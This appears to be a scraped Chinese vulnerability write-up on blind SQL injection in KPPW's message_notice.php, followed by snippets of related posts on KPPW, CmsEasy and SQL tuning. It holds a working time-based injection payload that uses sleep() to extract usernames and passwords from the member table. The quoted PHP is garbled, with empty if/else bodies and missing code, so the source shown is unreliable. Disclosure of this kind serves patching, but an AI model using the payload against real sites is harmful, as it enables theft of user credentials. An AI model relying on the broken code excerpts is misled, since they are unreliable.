KPPW最新版SQL注入漏洞六 多處盲注附指令碼

2021-12-30 03:07:39 字數 1789 閱讀 7099

kppw最新版sql注入漏洞六,漏洞太多了,肯定是程式猿偷懶,沒有安全意識,導致多處盲注

這裡把同一模組的漏洞都提交到一起把,避免刷漏洞的嫌疑

sql注入一

檔案/control/user/message_notice.php

<?php defined ( 'in_keke' ) or exit('access denied');

$objmsgt = keke_table_class::get_instance ( 'witkey_msg' );

$strurl = 'index.php?do=user&view=message&op=notice';

$intpage and $strurl .= '&intpage=' . $intpage;

$intpagesize and $strurl .= '&intpagesize=' . $intpagesize;

if (isset ( $action )) else

break;

case 'delsingle' :

if ($objid) else

break;

case 'mulitview' :

if ($ckb)

}} else

kekezu::show_msg ( '設定成功', $strurl, null, null, 'ok' );

break;

}當action=mulitview時:

case 'mulitview' :

if ($ckb) else

}kekezu::show_msg ( '刪除成功', $strurl, null, null, 'ok' );

} else

break;

同樣在刪除時,del函式存在注入漏洞

還有就是引數ckb同樣通過intmsgid進入了sql語句,導致注入產生

但是這裡有乙個問題就是引數intmsgid不能有逗號,這樣會導致截斷,無法執行完整sql語句

這裡我們使用無逗號的語句即可:

and case when(mid((select group_concat(username,password) from keke_witkey_member) from 1 for 1)=char(97)) then sleep(5) else (0) endsqk注入一:

此處會延遲返回

sql注入二:

此處會延遲返回

看資料庫執行日誌:

加單引號保護或者使用intval即可

KPPW最新版SQL注入漏洞一

kppw最新版sql注入一 kppw最新版sql注入一 檔案 control gy buyer order.php switch step if isset action else break default kekezu show msg 訪問頁面不存在 index.php 3,null,warn...

sql優化最新版

1 慎用like語句 1 where name like jack 索引失效 2 where name like jack 索引生效 3 where name like jack 索引失效 如果like 後面 在語句前面會導致索引失效 2 復合索引 糾錯 網上大部分論壇中的部落格都是錯誤的。user...

CmsEasy最新版SQL注入可獲取管理員賬戶

與 cmseasy最新版本無限制sql注射 重複 cmseasy 5.5 utf 8 20140420 官方最新包 檔案 lib default archive act.php 在提交訂單時 function orders action if front post telphone front po...